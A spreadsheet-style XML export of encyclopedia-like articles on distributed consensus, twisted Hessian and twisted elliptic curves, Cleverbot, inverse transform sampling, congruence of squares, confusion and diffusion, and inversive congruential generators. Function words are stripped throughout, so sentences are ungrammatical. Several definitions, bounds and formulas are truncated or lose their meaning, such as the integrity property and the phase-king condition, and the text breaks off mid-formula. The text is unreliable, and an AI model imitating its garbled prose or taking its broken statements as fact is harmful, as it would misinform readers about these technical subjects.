    <t>fundamental problem distributed computing multi-agent systems achieve overall system reliability presence number faulty processes. this often requires coordinating processes reach consensus, agree data value needed computation. example applications consensus include agreeing transactions commit database order, state machine replication, atomic broadcasts. real-world applications often requiring consensus include cloud computing, clock synchronization, pagerank, opinion formation, smart power grids, state estimation, control uavs (and multiple robots/agents general), load balancing, blockchain, others. problem description consensus problem requires agreement among number processes agents) single data value. some processes (agents) fail unreliable ways, consensus protocols must fault tolerant resilient. processes must somehow forth candidate values, communicate another, agree single consensus value. consensus problem fundamental problem control multi-agent systems. approach generating consensus processes (agents) agree majority value. context, majority requires least half available votes (where process given vote). however, faulty processes skew resultant outcome consensus reached reached incorrectly. protocols solve consensus problems designed deal limited numbers faulty processes. these protocols must satisfy number requirements useful. instance, trivial protocol could processes output binary value this useful thus requirement modified output must somehow depend input. that output value consensus protocol must input value process. another requirement process decide upon output value decision irrevocable. process called correct execution experience failure. consensus protocol tolerating halting failures must satisfy following properties. termination eventually, every correct process decides value. integrity correct processes proposed value {\displaystyle correct process must decide {\displaystyle agreement every correct process must agree value.variations definition integrity appropriate, according application. example, weaker type integrity would decision value equal value correct process proposed necessarily them. integrity condition also known validity literature.a protocol correctly guarantee consensus amongst processes fail said t-resilient. evaluating performance consensus protocols factors interest running time message complexity. running time given notation number rounds message exchange function input parameters (typically number processes and/or size input domain). message complexity refers amount message traffic generated protocol. other factors include memory usage size messages. models computation varying models computation define "consensus problem". some models deal fully connected graphs, others deal rings trees. models message authentication allowed, whereas others processes completely anonymous. shared memory models processes communicate accessing objects shared memory also important area research. communication channels direct transferable authentication models communication protocol participants communicate authenticated channels. this means messages anonymous, receivers know source every message receive. some models assume stronger, transferable form authentication, message signed sender, receiver knows immediate source every message, participant initially created message. this stronger type authentication achieved digital signatures, stronger form authentication available, protocols tolerate larger number faults.the different authentication models often called oral communication written communication models. oral communication model, immediate source information known, whereas stronger, written communication models, every step along receiver learns immediate source message, communication history message. inputs outputs consensus traditional single-value consensus protocols paxos, cooperating nodes agree single value integer, variable size encode useful metadata transaction committed database. special case single-value consensus problem, called binary consensus, restricts input, hence output domain, single binary digit {0,1}. while highly useful themselves, binary consensus protocols often useful building blocks general consensus protocols, especially asynchronous consensus. multi-valued consensus protocols multi-paxos raft, goal agree single value series values time, forming progressively-growing history. while multi-valued consensus achieved naively running multiple iterations single-valued consensus protocol succession, many optimizations considerations reconfiguration support make multi-valued consensus protocols efficient practice. crash byzantine failures there types failures process undergo, crash failure byzantine failure. crash failure occurs process abruptly stops resume. byzantine failures failures absolutely conditions imposed. example, occur result malicious actions adversary. process experiences byzantine failure send contradictory conflicting data processes, sleep resume activity lengthy delay. types failures, byzantine failures disruptive. thus, consensus protocol tolerating byzantine failures must resilient every possible error occur. stronger version consensus tolerating byzantine failures given strengthening integrity constraint: integrity correct process decides {\displaystyle {\displaystyle must proposed correct process. asynchronous synchronous systems consensus problem considered case asynchronous synchronous systems. while real world communications often inherently asynchronous, practical often easier model synchronous systems, given asynchronous systems naturally involve issues synchronous ones. synchronous systems, assumed communications proceed rounds. round, process send messages requires, receiving messages processes. manner, message round influence messages sent within round. impossibility result asynchronous deterministic consensus fully asynchronous message-passing distributed system, least process crash failure, proven famous impossibility result deterministic algorithm achieving consensus impossible. this impossibility result derives worst-case scheduling scenarios, unlikely occur practice except adversarial situations intelligent denial-of-service attacker network. normal situations, process scheduling degree natural randomness.in asynchronous model, forms failures handled synchronous consensus protocol. instance, loss communication link modeled process suffered byzantine failure. randomized consensus algorithms circumvent impossibility result achieving safety liveness overwhelming probability, even worst-case scheduling scenarios intelligent denial-of-service attacker network. permissioned versus permissionless consensus consensus algorithms traditionally assume participating nodes fixed given outset: prior (manual automatic) configuration process permissioned particular known group participants authenticate members group. absence well-defined, closed group authenticated members, sybil attack open consensus group defeat even byzantine consensus algorithm, simply creating enough virtual participants overwhelm fault tolerance threshold. permissionless consensus protocol, contrast, allows anyone network join dynamically participate without prior permission, instead imposes different form artificial cost barrier entry mitigate sybil attack threat. bitcoin introduced first permissionless consensus protocol using proof work difficulty adjustment function, participants compete solve cryptographic hash puzzles, probabilistically earn right commit blocks earn associated rewards proportion invested computational effort. motivated part high energy cost approach, subsequent permissionless consensus protocols proposed adopted alternative participation rules sybil attack protection, proof stake, proof space, proof authority. equivalency agreement problems three agreement problems interest follows. terminating reliable broadcast collection {\displaystyle processes, numbered {\displaystyle {\displaystyle n-1,} communicate sending messages another. process {\displaystyle must transmit value {\displaystyle processes that: process {\displaystyle correct, every correct process receives {\displaystyle correct processes, process receives value.it also known general's problem. consensus formal requirements consensus protocol include: agreement: correct processes must agree value. weak validity: correct process, output must input correct process. strong validity: correct processes receive input value, must output value. termination: processes must eventually decide output value weak interactive consistency processes partially synchronous system (the system alternates good periods synchrony), process chooses private value. processes communicate rounds determine public value generate consensus vector following requirements: correct process sends {\displaystyle correct processes receive either {\displaystyle nothing (integrity property) messages sent round correct process received round correct processes (consistency property).it shown variations problems equivalent solution problem type model solution another problem another type model. example, solution weak byzantine general problem synchronous authenticated message passing model leads solution weak interactive consistency. interactive consistency algorithm solve consensus problem process choose majority value consensus vector consensus value. solvability results agreement problems there t-resilient anonymous synchronous protocol solves byzantine generals problem, {\displaystyle {\tfrac {t}{n}}&lt;{\tfrac {1}{3}}} weak byzantine generals case {\displaystyle number failures {\displaystyle number processes. systems {\displaystyle processors, {\displaystyle byzantine, shown exists algorithm solves consensus problem {\displaystyle n\leq oral-messages model. proof constructed first showing impossibility three-node case {\displaystyle n=3} using result argue partitions processors. written-messages model protocols tolerate {\displaystyle n=f+1} fully asynchronous system consensus solution tolerate crash failures even requiring triviality property. this result sometimes called impossibility proof named authors michael fischer, nancy lynch, mike paterson awarded dijkstra prize significant work. result mechanically verified hold even fairness assumptions. however, state consensus never reached: merely model's assumptions, algorithm always reach consensus bounded time. practice highly unlikely occur. some consensus protocols paxos consensus algorithm leslie lamport, variants raft, used pervasively widely deployed distributed cloud computing systems. these algorithms typically synchronous, dependent elected leader make progress, tolerate crashes byzantine failures. example polynomial time binary consensus protocol tolerates byzantine failures phase king algorithm garay berman. algorithm solves consensus synchronous message passing model processes failures, provided phase king algorithm, phases, rounds phase. each process keeps track preferred output (initially equal process's input value). first round phase process broadcasts preferred value processes. receives values processes determines value majority value count. second round phase, process whose matches current phase number designated king phase. king broadcasts majority value observed first round serves breaker. each process updates preferred value follows. count majority value process observed first round greater process changes preference majority value; otherwise uses phase king's value. phases processes output preferred values. google implemented distributed lock service library called chubby. chubby maintains lock information small files stored replicated database achieve high availability face failures. database implemented fault-tolerant layer based paxos consensus algorithm. scheme, chubby clients communicate paxos master order access/update replicated log; i.e., read/write files.many peer-to-peer online real-time strategy games modified lockstep protocol consensus protocol order manage game state players game. each game action results game state delta broadcast players game along hash total game state. each player validates change applying delta game state comparing game state hashes. hashes agree vote cast, players whose game state minority disconnected removed game (known desync.) another well-known approach called msr-type algorithms used widely computer science control theory. permissionless consensus protocols bitcoin uses proof work, difficulty adjustment function reorganization function achieve permissionless consensus open peer-to-peer network. extend bitcoin's blockchain distributed ledger, miners attempt solve cryptographic puzzle, probability finding solution proportional computational effort expended hashes second. node first solves puzzle proposed version next block transactions added ledger eventually accepted nodes. node network attempt solve proof-of-work problem, sybil attack infeasible principle unless attacker computational resources network. other cryptocurrencies (i.e. neo, stratis, ...) proof stake, nodes compete append blocks earn associated rewards proportion stake, existing cryptocurrency allocated locked staked time period. advantage 'proof stake' 'proof work' system, high energy consumption demanded latter. example, bitcoin mining (2018) estimated consume non-renewable energy sources amount similar entire nations czech republic jordan.some cryptocurrencies, ripple, system validating nodes validate ledger. this system used ripple, called ripple protocol consensus algorithm (rpca), works rounds: step every server compiles list valid candidate transactions; step server amalgamates candidates coming unique nodes list (unl) votes veracity; step transactions passing minimum threshold passed next round; step final round requires agreementother participation rules used permissionless consensus protocols impose barriers entry resist sybil attacks include proof authority, proof space, proof burn, proof elapsed time. these alternatives largely motivated high amount computational energy consumed proof work. proof space used cryptocoins burstcoin. contrasting permissionless participation rules, reward participants proportion amount investment action resource, proof personhood protocols give real human participant exactly unit voting power permissionless consensus, regardless economic investment. proposed approaches achieving one-per-person distribution consensus power proof personhood include physical pseudonym parties, social networks, pseudonymized government-issued identities, biometrics. consensus number solve consensus problem shared-memory system, concurrent objects must introduced. concurrent object, shared object, data structure helps concurrent processes communicate reach agreement. traditional implementations using critical sections face risk crashing process dies inside critical section sleeps intolerably long time. researchers defined wait-freedom guarantee algorithm completes finite number steps. consensus number concurrent object defined maximum number processes system reach consensus given object wait-free implementation. objects consensus number {\displaystyle implement object consensus number {\displaystyle lower, cannot implement objects higher consensus number. consensus numbers form called herlihy's hierarchy synchronization objects. according hierarchy, read/write registers cannot solve consensus even 2-process system. data structures like stacks queues solve consensus processes. however, concurrent objects universal (notated table {\displaystyle \infty means solve consensus among number processes simulate objects operation sequence. also uniform consensus quantum byzantine agreement byzantine fault tolerance references further reading herlihy, shavit, (1999). "the topological structure asynchronous computability". journal acm. (6): 858. citeseerx 10.1.1.78.1455. doi:10.1145/331524.331529. s2cid 5797174. saks, zaharoglou, (2000). "wait-free k-set agreement impossible: topology public knowledge". siam journal computing. (5): 1449–1483. doi:10.1137/s0097539796307698.</t>
  </si>
  <si>
    <t>Twisted Hessian curves</t>
  </si>
  <si>
    <t>mathematics, twisted hessian curve represents generalization hessian curves; introduced elliptic curve cryptography speed addition doubling formulas strongly unified arithmetic. operations (see last sections), close speed edwards curves. definition field. according twisted hessian curves introduced bernstein, lange, kohel. twisted hessian form affine coordinates given {\displaystyle a\cdot x^{3}+y^{3}+1=d\cdot x\cdot projective coordinates: {\displaystyle a\cdot x^{3}+y^{3}+z^{3}=d\cdot x\cdot y\cdot {\displaystyle x={\frac {x}{z}}} {\displaystyle y={\frac {y}{z}}} note curves birationally equivalent hessian curves. hessian curve special case twisted hessian curve, a=1. considering equation note that: cube root exists unique b3.otherwise, necessary consider extension field (e.g., k(a1/3)). then, since bx3, defining following equation needed hessian form) transformation: {\displaystyle t^{3}+y^{3}+1=d\cdot x\cdot this means twisted hessian curves birationally equivalent elliptic curve weierstrass form. group interesting analyze group elliptic curve, defining addition doubling formulas (because simple power analysis differential power analysis attacks based running time operations). general, group defined following way: three points lies line zero. property, explicit formulas group depend curve shape. (x1, point, inverse (x1/y1, 1/y1) plane. projective coordinates, point, (x1/y1 1/y1 inverse furthermore, neutral element affine plane) projective coordinates: applications elliptic curve cryptography elliptic curve method integer factorization (ecm) necessary compute scalar multiplications [n]p integer based double-and-add method; addition doubling formulas needed. addition doubling formulas elliptic curve defined, using affine coordinates simplify notation: addition formulas (x1, (x2, y2); then, (x3, given following equations: {\displaystyle x_{3}={\frac {x_{1}-y_{1}^{2}\cdot x_{2}\cdot y_{2}}{a\cdot x_{1}\cdot y_{1}\cdot x_{2}^{2}-y_{2}}}} {\displaystyle y_{3}={\frac {y_{1}\cdot y_{2}^{2}-a\cdot x_{1}^{2}\cdot x_{2}}{a\cdot x_{1}\cdot y_{1}\cdot x_{2}^{2}-y_{2}}}} doubling formulas [2]p (x1, given following equations: {\displaystyle x_{1}={\frac {x-y^{3}\cdot x}{a\cdot y\cdot x^{3}-y}}} {\displaystyle y_{1}={\frac {y^{3}-a\cdot x^{3}}{a\cdot y\cdot x^{3}-y}}} algorithms examples here efficient algorithms addition doubling given; important cryptographic computations, projective coordinates used purpose. addition {\displaystyle a=x_{1}\cdot z_{2}} {\displaystyle b=z_{1}\cdot z_{2}} {\displaystyle c=y_{1}x_{2}} {\displaystyle d=y_{1}\cdot y_{2}} {\displaystyle e=z_{1}\cdot y_{2}} {\displaystyle f=a\cdot x_{1}\cdot x_{2}} {\displaystyle x_{3}=a\cdot b-c\cdot {\displaystyle y_{3}=d\cdot e-f\cdot {\displaystyle z_{3}=f\cdot c-b\cdot cost algorithm multiplications, multiplication (constant) additions. example: points twisted hessian curve d=-2.then given {\displaystyle a=-1;b=-1;c=-1;d=-1;e=1;f=2;} {\displaystyle x_{3}=0} {\displaystyle y_{3}=-3} {\displaystyle z_{3}=-3} that −3). doubling {\displaystyle d=x_{1}^{3}} {\displaystyle e=y_{1}^{3}} {\displaystyle f=z_{1}^{3}} {\displaystyle g=a\cdot {\displaystyle x_{3}=x_{1}\cdot (e-f)} {\displaystyle y_{3}=z_{1}\cdot (g-e)} {\displaystyle z_{3}=y_{1}\cdot (f-g)} cost algorithm multiplications, multiplication constant, additions cube powers. this best result obtained curve. example: point curve defined d=-2 above, [2]p given {\displaystyle d=1;e=-1;f=1;g=-4;} {\displaystyle x_{3}=-2} {\displaystyle y_{3}=-3} {\displaystyle z_{3}=-5} that also table costs operations elliptic curves external links http://hyperelliptic.org/efd/g1p/index.html references http://hyperelliptic.org/efd/g1p/auto-twistedhessian.html</t>
  </si>
  <si>
    <t>Cleverbot</t>
  </si>
  <si>
    <t>cleverbot chatterbot application uses artificial intelligence (ai) algorithm conversations humans. created british scientist rollo carpenter. preceded jabberwacky, chatbot project began 1986 went online 1997. first decade, cleverbot held several thousand conversations carpenter associates. since launching web, number conversations held exceeded million. besides application, cleverbot also available ios, android, windows phone app. operation unlike chatterbots, cleverbot's responses pre-programmed. instead, learns human input: humans type cleverbot logo system finds keywords exact phrase matching input. after searching saved conversations, responds input finding human responded input asked, part full, cleverbot.cleverbot participated formal turing test 2011 techniche festival indian institute technology guwahati september 2011. 1334 votes cast, cleverbot judged 59.3% human, compared rating 63.3% human achieved human participants. score 50.05% higher often considered passing grade. software running event handle simultaneous requests, whereas online cleverbot usually talking around 10,000 50,000 people once. developments cleverbot constantly growing data size rate million interactions second. updates software mostly behind scenes. 2014, cleverbot upgraded serving techniques. unlike eliza, program respond fixed way, instead choosing responses heuristically using fuzzy logic, whole conversation compared millions taken place before. cleverbot uses million interactions, 3-4% data already accumulated. developers cleverbot attempting build version using machine learning techniques.a significant part engine behind cleverbot accessing made available developers form cleverscript. service directly accessing cleverbot made available developers form cleverbot.io.an uses cleverscript engine play game questions, launched name clevernator. unlike games, player asks questions role understand, answer factually. allows owners create talk small cleverbot-like launched, called cleverme! apple products.in early 2017, twitch stream google home devices modified talk using cleverbot.io garnered 700,000 visitors 30,000 peak concurrent viewers. popular culture late 2010, cleverbot received widespread media attention featured popular creepypasta serial drowned alexander hall. also omegle references external links official website cleverscript website cleverbot.io website livestream cleverbots chatting twitch</t>
  </si>
  <si>
    <t>Inverse transform sampling</t>
  </si>
  <si>
    <t>inverse transform sampling (also known inversion sampling, inverse probability integral transform, inverse transformation method, smirnov transform, golden rule) basic method pseudo-random number sampling, i.e., generating sample numbers random probability distribution given cumulative distribution function. inverse transformation sampling takes uniform samples number {\displaystyle interpreted probability, returns largest number {\displaystyle domain distribution {\displaystyle p(x)} {\displaystyle p(-\infty &lt;x&lt;x)\leq example, imagine {\displaystyle p(x)} standard normal distribution mean zero standard deviation one. table shows samples taken uniform distribution representation standard normal distribution. randomly choosing proportion area curve returning number domain exactly proportion area occurs left number. intuitively, unlikely choose number tails little area would require choosing number close zero one. computationally, method involves computing quantile function distribution words, computing cumulative distribution function (cdf) distribution (which maps number domain probability inverting function. this source term "inverse" "inversion" names method. note discrete distribution, computing general difficult: simply individual probabilities various points distribution. continuous distribution, however, need integrate probability density function (pdf) distribution, impossible analytically distributions (including normal distribution). result, method computationally inefficient many distributions methods preferred; however, useful method building generally applicable samplers based rejection sampling. normal distribution, lack analytical expression corresponding quantile function means methods (e.g. box–muller transform) preferred computationally. often case that, even simple distributions, inverse transform sampling method improved see, example, ziggurat algorithm rejection sampling. hand, possible approximate quantile function normal distribution extremely accurately using moderate-degree polynomials, fact method fast enough inversion sampling default method sampling normal distribution statistical package definition probability integral transform states {\displaystyle continuous random variable cumulative distribution function {\displaystyle f_{x}} random variable {\displaystyle y=f_{x}(x)} uniform distribution inverse probability integral transform inverse this: specifically, {\displaystyle uniform distribution {\displaystyle cumulative distribution {\displaystyle f_{x}} random variable {\displaystyle f_{x}^{-1}(y)} distribution {\displaystyle intuition from {\displaystyle u\sim \mathrm {unif} [0,1]} want generate {\displaystyle {\displaystyle f_{x}(x).} assume {\displaystyle f_{x}(x)} strictly increasing function, provides good intuition. want find strictly monotone transformation {\displaystyle t:[0,1]\mapsto \mathbb {\displaystyle t(u){\overset {d}{=}}x} {\displaystyle f_{x}(x)=\pr(x\leq x)=\pr(t(u)\leq x)=\pr(u\leq t^{-1}(x))=t^{-1}(x),{\text{ }}x\in \mathbb last step used {\displaystyle \pr(u\leq y)=y} {\displaystyle uniform {\displaystyle (0,1)} {\displaystyle f_{x}} inverse function {\displaystyle equivalently {\displaystyle t(u)=f_{x}^{-1}(u),u\in [0,1].} therefore, generate {\displaystyle {\displaystyle f_{x}^{-1}(u).} method problem inverse transform sampling method solves follows: {\displaystyle random variable whose distribution described cumulative distribution function {\displaystyle f_{x}} want generate values {\displaystyle distributed according distribution.the inverse transform sampling method works follows: generate random number {\displaystyle standard uniform distribution interval {\displaystyle [0,1]} e.g. {\displaystyle u\sim \mathrm {unif} [0,1].} find inverse desired cdf, e.g. {\displaystyle f_{x}^{-1}(x)} compute {\displaystyle x=f_{x}^{-1}(u)} computed random variable {\displaystyle distribution {\displaystyle f_{x}(x)} .expressed differently, given continuous uniform variable {\displaystyle {\displaystyle [0,1]} invertible cumulative distribution function {\displaystyle f_{x}} random variable {\displaystyle x=f_{x}^{-1}(u)} distribution {\displaystyle f_{x}} (or, {\displaystyle distributed {\displaystyle f_{x}} treatment inverse functions objects satisfying differential equations given. some differential equations admit explicit power series solutions, despite non-linearity. examples example, suppose random variable {\displaystyle u\sim \mathrm {unif} (0,1)} cumulative distribution function {\displaystyle {\begin{aligned}f(x)=1-\exp(-{\sqrt {x}})\end{aligned}}} order perform inversion want solve {\displaystyle f(f^{-1}(u))=u} {\displaystyle {\begin{aligned}f(f^{-1}(u))&amp;=u\\1-\exp \left(-{\sqrt {f^{-1}(u)}}\right)&amp;=u\\f^{-1}(u)&amp;=(-\log(1-u))^{2}\\&amp;=(\log(1-u))^{2}\end{aligned}}} from would perform steps one, three.as another example, exponential distribution {\displaystyle f_{x}(x)=1-e^{-\lambda (and otherwise). solving y=f(x) obtain inverse function {\displaystyle x=f^{-1}(y)=-{\frac {1}{\lambda }}\ln(1-y).} means draw {\displaystyle y_{0}} {\displaystyle u\sim \mathrm {unif} (0,1)} compute {\displaystyle x_{0}=f_{x}^{-1}(y_{0})=-{\frac {1}{\lambda }}\ln(1-y_{0}),} this {\displaystyle x_{0}} exponential distribution. idea illustrated following graph: note distribution change start instead computational purposes, therefore suffices generate random numbers simply calculate {\displaystyle x=f^{-1}(y)=-{\frac {1}{\lambda }}\ln(y).} proof correctness continuous cumulative distribution function, inverse function (using infimum cdfs weakly monotonic right-continuous): {\displaystyle f^{-1}(u)=\inf \;\{x\mid f(x)\geq u\}\qquad (0&lt;u&lt;1).} claim: uniform random variable {\displaystyle f^{-1}(u)} cdf. proof: applying sides uniform {\displaystyle {\begin{aligned}&amp;\pr(f^{-1}(u)\leq x)\\&amp;{}=\pr(u\leq f(x))\quad &amp;({\text{applying }}f,{\text{ sides}})\\&amp;{}=f(x)\quad &amp;({\text{because }}\pr(u\leq y)=y,{\text{ uniform on}}(0,1))\\\end{aligned}}} truncated distribution inverse transform sampling simply extended cases truncated distributions interval {\displaystyle (a,b]} without cost rejection sampling: algorithm followed, instead generating random number {\displaystyle uniformly distributed generate {\displaystyle uniformly distributed {\displaystyle f(a)} {\displaystyle f(b)} take {\displaystyle f^{-1}(u)} reduction number inversions order obtain large number samples, needs perform number inversions distribution. possible reduce number inversions obtaining large number samples application so-called stochastic collocation monte carlo sampler (scmc sampler) within polynomial chaos expansion framework. this allows generate number monte carlo samples inversions original distribution independent samples variable inversions analytically available, example standard normal variable. also probability integral transform copula, defined means probability integral transform. quantile function, explicit construction inverse cdfs. inverse distribution function precise mathematical definition distributions discrete components. references</t>
  </si>
  <si>
    <t>Congruence of squares</t>
  </si>
  <si>
    <t>number theory, congruence squares congruence commonly used integer factorization algorithms. derivation given positive integer fermat's factorization method relies finding numbers satisfying equality {\displaystyle x^{2}-y^{2}=n} factor y)(x this algorithm slow practice need search many numbers, satisfy equation. however, also factored satisfy weaker congruence squares condition: {\displaystyle x^{2}\equiv y^{2}{\pmod {n}}} {\displaystyle x\not \equiv y\,{\pmod {n}}} from easily deduce {\displaystyle x^{2}-y^{2}\equiv 0{\pmod {n}}} {\displaystyle (x+y)(x-y)\equiv 0{\pmod {n}}} this means divides product y)(x thus contain factors factors trivial. case need find another computing greatest common divisors give factors; done quickly using euclidean algorithm. congruences squares extremely useful integer factorization algorithms extensively used example, quadratic sieve, general number field sieve, continued fraction factorization, dixon's factorization. conversely, finding square roots modulo composite number turns probabilistic polynomial-time equivalent factoring number, integer factorization algorithm used efficiently identify congruence squares. further generalizations also possible factor bases help find congruences squares quickly. instead looking {\displaystyle \textstyle x^{2}\equiv y^{2}{\pmod {n}}} outset, find many {\displaystyle \textstyle x^{2}\equiv y{\pmod {n}}} small prime factors, multiply together square right-hand side. examples factorize take find {\displaystyle \textstyle 6^{2}=36\equiv 1=1^{2}{\pmod {35}}} thus factor {\displaystyle \gcd(6-1,35)\cdot \gcd(6+1,35)=5\cdot 7=35} factorize 1649 using 1649, example finding congruence squares built products non-squares (see dixon's factorization method), first obtain several congruences 1649 {\displaystyle 41^{2}\equiv 32{\pmod {1649}}} 1649 {\displaystyle 42^{2}\equiv 115{\pmod {1649}}} 1649 {\displaystyle 43^{2}\equiv 200{\pmod {1649}}} these, small primes factors {\displaystyle 32=2^{5}} {\displaystyle 200=2^{3}\cdot 5^{2}} combination even power small prime, therefore square {\displaystyle 32\cdot 200=2^{5+3}\cdot 5^{2}=2^{8}\cdot 5^{2}=(2^{4}\cdot 5)^{2}=80^{2}} yielding congruence squares 1649 {\displaystyle 32\cdot 200=80^{2}\equiv 41^{2}\cdot 43^{2}\equiv 114^{2}{\pmod {1649}}} using values gives factors 1649 1649 1649. {\displaystyle \gcd(114-80,1649)\cdot \gcd(114+80,1649)=17\cdot 97=1649.} also congruence relation</t>
  </si>
  <si>
    <t>Confusion and diffusion</t>
  </si>
  <si>
    <t>cryptography, confusion diffusion properties operation secure cipher identified claude shannon 1945 classified report mathematical theory cryptography. these properties, present, work thwart application statistics methods cryptanalysis. these concepts also important design secure hash functions pseudorandom number generators decorrelation generated values main feature. definition confusion confusion means binary digit (bit) ciphertext depend several parts key, obscuring connections two.the property confusion hides relationship ciphertext key. this property makes difficult find ciphertext single changed, calculation bits ciphertext affected. confusion increases ambiguity ciphertext used block stream ciphers. substitution–permutation networks, confusion provided substitution boxes. diffusion diffusion means change single plaintext, half bits ciphertext change, similarly, change ciphertext, half plaintext bits change. this equivalent expectation encryption schemes exhibit avalanche effect. purpose diffusion hide statistical relationship ciphertext plain text. example, diffusion ensures patterns plaintext, redundant bits, apparent ciphertext. block ciphers achieve "diffusing" information plaintext's structure across rows columns cipher. substitution–permutation networks, diffusion provided permutation boxes. theory shannon's original definitions, confusion refers making relationship ciphertext symmetric complex involved possible; diffusion refers dissipating statistical structure plaintext bulk ciphertext. this complexity generally implemented well-defined repeatable series substitutions permutations. substitution refers replacement certain components (usually bits) components, following certain rules. permutation refers manipulation order bits according algorithm. effective, non-uniformity plaintext bits needs redistributed across much larger structures ciphertext, making non-uniformity much harder detect. particular, randomly chosen input, flips i-th bit, probability j-th output change half, j—this termed strict avalanche criterion. more generally, require flipping fixed bits change output probability half. confusion make hard find even large number plaintext-ciphertext pairs produced key. therefore, ciphertext depend entire key, different ways different bits key. particular, changing change ciphertext completely. simplest achieve diffusion confusion substitution–permutation network. systems, plaintext often similar role producing output, hence mechanism ensures diffusion confusion. applied encryption designing encryption method uses principles confusion diffusion. confusion means process drastically changes data input output, example, translating data non-linear table created key. there many ways reverse linear calculations, non-linear analysis tools breaks. diffusion means changing single character input change many characters output. done well, every part input affects every part output, making analysis much harder. diffusion process perfect: always lets patterns. good diffusion scatters patterns widely output, several patterns making scramble other. this makes patterns vastly harder spot, vastly increases amount data analyze break cipher. analysis advanced encryption standard (aes) excellent confusion diffusion. confusion look-up tables non-linear good destroying patterns. diffusion stage spreads every part input every part output: changing input changes half output bits average. both confusion diffusion repeated multiple times input increase amount scrambling. secret mixed every stage attacker cannot precalculate cipher does. none happens simple one-stage scramble based key. input patterns would flow straight output. might look random analysis would find obvious patterns cipher could broken. also algorithmic information theory avalanche effect substitution–permutation network references works cited claude shannon, mathematical theory cryptography", bell system technical memo 45-110-02, september 1945. claude shannon, "communication theory secrecy systems", bell system technical journal, vol. 28-4, pages 656–715, 1949. wade trappe lawrence washington, introduction cryptography coding theory. second edition. pearson prentice hall, 2006.</t>
  </si>
  <si>
    <t>Twists of elliptic curves</t>
  </si>
  <si>
    <t>mathematical field algebraic geometry, elliptic curve field associated quadratic twist, another elliptic curve isomorphic algebraic closure particular, isomorphism elliptic curves isogeny degree invertible isogeny. some curves higher order twists cubic quartic twists. curve twists j-invariant. applications twists include cryptography, solution diophantine equations, generalized hyperelliptic curves, study sato–tate conjecture. quadratic twist first assume {\displaystyle field characteristic different {\displaystyle elliptic curve {\displaystyle form: {\displaystyle y^{2}=x^{3}+a_{2}x^{2}+a_{4}x+a_{6}.\,} given {\displaystyle d\neq square {\displaystyle quadratic twist {\displaystyle curve {\displaystyle e^{d}} defined equation: {\displaystyle dy^{2}=x^{3}+a_{2}x^{2}+a_{4}x+a_{6}.\,} equivalently {\displaystyle y^{2}=x^{3}+da_{2}x^{2}+d^{2}a_{4}x+d^{3}a_{6}.\,} elliptic curves {\displaystyle {\displaystyle e^{d}} isomorphic {\displaystyle rather field extension {\displaystyle k({\sqrt {d}})} qualitatively speaking, arithmetic curve quadratic twist look different field {\displaystyle complex analysis curves same; family curves related twisting becomes useful setting study arithmetic properties elliptic curves.twists also defined base field {\displaystyle characteristic {\displaystyle elliptic curve {\displaystyle form: {\displaystyle y^{2}+a_{1}xy+a_{3}y=x^{3}+a_{2}x^{2}+a_{4}x+a_{6}.\,} given {\displaystyle d\in {\displaystyle x^{2}+x+d} irreducible polynomial {\displaystyle quadratic twist {\displaystyle curve {\displaystyle e^{d}} defined equation: {\displaystyle y^{2}+a_{1}xy+a_{3}y=x^{3}+(a_{2}+da_{1}^{2})x^{2}+a_{4}x+a_{6}+da_{3}^{2}.\,} elliptic curves {\displaystyle {\displaystyle e^{d}} isomorphic {\displaystyle field extension {\displaystyle k[x]/(x^{2}+x+d)} quadratic twist finite fields {\displaystyle finite field {\displaystyle elements, {\displaystyle exist {\displaystyle point {\displaystyle (x,y)} belongs either {\displaystyle {\displaystyle e^{d}} fact, {\displaystyle (x,y)} curves, exactly {\displaystyle curve (which happen characteristic {\displaystyle consequence, {\displaystyle |e(k)|+|e^{d}(k)|=2q+2} equivalently {\displaystyle t_{e^{d}}=-t_{e}} {\displaystyle t_{e}} trace frobenius endomorphism curve. quartic twist possible "twist" elliptic curves j-invariant equal 1728 quartic characters; twisting curve {\displaystyle quartic twist, obtains precisely four curves: isomorphic {\displaystyle quadratic twist, really new. also case, twisted curves isomorphic field extension given twist degree. cubic twist analogously quartic twist case, elliptic curve {\displaystyle j-invariant equal zero twisted cubic characters. curves obtained isomorphic starting curve field extension given twist degree. generalization twists defined smooth projective curves well. {\displaystyle field {\displaystyle curve field, i.e., projective variety dimension {\displaystyle irreducible geometrically connected. then twist {\displaystyle {\displaystyle another smooth projective curve exists {\displaystyle {\bar {k}}} -isomorphism {\displaystyle {\displaystyle field {\displaystyle {\bar {k}}} algebraic closure {\displaystyle examples twisted hessian curves twisted edwards curve twisted tripling-oriented doche–icart–kohel curve references stevenhagen (2008). elliptic curves (pdf). universiteit leiden. stewart (october 1995). ranks twists elliptic curves power-free values binary forms". journal american mathematical society. (4): 943–973. doi:10.1090/s0894-0347-1995-1290234-5. jstor 2152834.</t>
  </si>
  <si>
    <t>Inversive congruential generator</t>
  </si>
  <si>
    <t>inversive congruential generators type nonlinear congruential pseudorandom number generator, modular multiplicative inverse exists) generate next number sequence. standard formula inversive congruential generator, modulo prime seed {\displaystyle x_{0}={\text{seed}},} {\displaystyle x_{i+1}={\begin{cases}(ax_{i}^{-1}+c){\bmod {q}}&amp;{\text{if }}x_{i}\neq 0,\\x_{i+1}=c&amp;{\text{if }}x_{i}=0.\end{cases}}} such generator denoted symbolically icg(q, seed) said parameters seed seed. period sequence {\displaystyle (x_{n})_{n\geq must {\displaystyle x_{i}=x_{j}} finitely many steps, since next element depends direct predecessor, also {\displaystyle x_{i+1}=x_{j+1}} etc. maximum length period function modulo t=q. polynomial {\displaystyle f(x)=x^{2}-cx-a\in \mathbb _{q}[x]} (polynomial ring {\displaystyle \mathbb _{q}} primitive, sequence maximum length. such polynomials called inversive maximal-period (imp) polynomials. sufficient condition maximum sequence period proper choice parameters according algorithm described chou. eichenauer-herrmann, lehn, grothe niederreiter shown inversive congruential generators good uniformity properties, particular regard lattice structure serial correlations. example icg(5, gives sequence {\displaystyle \mathbb _{5}} inverse, inverse conversely). example {\displaystyle f(x)=x^{2}-3x-2} irreducible {\displaystyle \mathbb _{5}[x]} neither roots, therefore period equal order show primitive, show primitive element {\displaystyle \mathbb _{5}[x]/(f)} compound inversive generator construction compound inversive generator (cig) relies combining congruential inversive generators according method described below. {\displaystyle p_{1},\dots ,p_{r}} distinct prime integers, {\displaystyle p_{j}\geq index {\displaystyle (x_{n})_{n\geq sequence elements {\displaystyle \mathbb _{p_{j}}} periodic period length {\displaystyle p_{j}} words, {\displaystyle \{x_{n}^{(j)}\mid 0\leq n\leq p_{j}\}\in \mathbb _{p_{j}}} index consider {\displaystyle t_{j}=t/p_{j}} {\displaystyle t=p_{1}\cdots 